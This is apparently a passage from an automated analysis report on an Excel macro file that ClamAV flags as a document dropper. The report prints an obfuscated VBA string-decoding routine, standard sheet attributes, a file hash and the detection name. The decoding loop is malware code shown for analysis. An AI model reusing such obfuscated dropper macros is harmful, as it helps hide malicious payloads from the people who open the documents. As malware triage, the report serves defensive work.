For IFctgq1Z1 = 0 To Len(CrMcSviMY)
    third = (third + k7Sc8zGx2(third) + 1) Mod 256
    fourth(IFctgq1Z1) = fourth(IFctgq1Z1) Xor k7Sc8zGx2(Temp + k7Sc8zGx2((third + k7Sc8zGx2(third)) Mod 254))
Next IFctgq1Z1
bFiJlSB8k = StrConv(fourth, vbUnicode)
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 42496 bytes
SHA-256: 9462d59318ac9d0643177f50e67c9d38725076a611399946904b15a7512a39c2
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.